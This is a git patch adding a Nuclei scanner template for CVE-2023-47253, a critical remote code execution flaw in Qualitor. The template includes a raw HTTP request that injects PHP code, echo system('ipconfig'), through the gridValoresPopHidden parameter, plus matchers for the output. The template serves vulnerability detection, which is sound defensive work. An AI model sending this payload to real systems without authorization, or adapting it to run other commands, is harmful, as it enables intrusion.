From 6d3ca0dd37903bdf416d2e4c1b691388aa0f623a Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 20 Sep 2024 20:59:55 +0300 Subject: [PATCH] add CVE-2023-47253 --- http/cves/2023/CVE-2023-47253.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-47253.yaml diff --git a/http/cves/2023/CVE-2023-47253.yaml b/http/cves/2023/CVE-2023-47253.yaml new file mode 100644 index 0000000000..c8fd8e1993 --- /dev/null +++ b/http/cves/2023/CVE-2023-47253.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-47253 + +info: + name: Qualitor <= 8.20 - Remote Code Execution + author: s4e-io + severity: critical + description: | + Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. + reference: + - https://github.com/vnxdtzip/CVE-2023-47253 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47253 + - https://openxp.xpsecsecurity.io/blog/cve-2023-47253 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-47253 + cwe-id: CWE-77 + epss-score: 0.00615 + epss-percentile: 0.78986 + cpe: cpe:2.3:a:qualitor:qalitor:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: qualitor + product: qualitor + fofa-query: "Qualitor" + tags: cve,cve2023,rce,qualitor + +http: + - raw: + - | + GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("ipconfig"); HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"Windows","DNS")' + - 'contains(content_type,"text/javascript")' + - 'status_code == 200' + condition: and